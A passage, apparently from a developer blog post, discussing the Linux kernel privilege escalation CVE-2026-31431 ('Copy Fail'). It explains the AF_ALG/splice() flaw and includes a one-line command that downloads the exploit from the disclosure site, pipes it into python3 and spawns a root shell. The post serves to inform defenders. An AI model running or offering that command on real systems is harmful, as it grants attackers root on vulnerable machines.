CVE-2026-31431 dropped this week. The disclosure site is at copy.fail and the writeup is short enough to read with coffee. The TL;DR: a logic flaw in the kernel's authencesn path, reachable through AF_ALG sockets, abused via splice() to land a 4-byte write into the page cache of any setuid binary. They picked /usr/bin/su for the demo. The whole exploit is 732 bytes of Python 3 standard library. No race window. No kernel offsets. Reliable across every affected distro from 2017 onward. Quick run: $ curl https://copy.fail/exp | python3 && su # Enter fullscreen mode Exit fullscreen mode Root shell. The kernel hands it over because AF_ALG is on by default and authencesn does the wrong thing under splice() . The bit nobody is talking about Copy Fail is a local privilege escalation. The attacker still needs an unprivileged shell on your box to fire it. So where does that shell come from? Same place it always does.…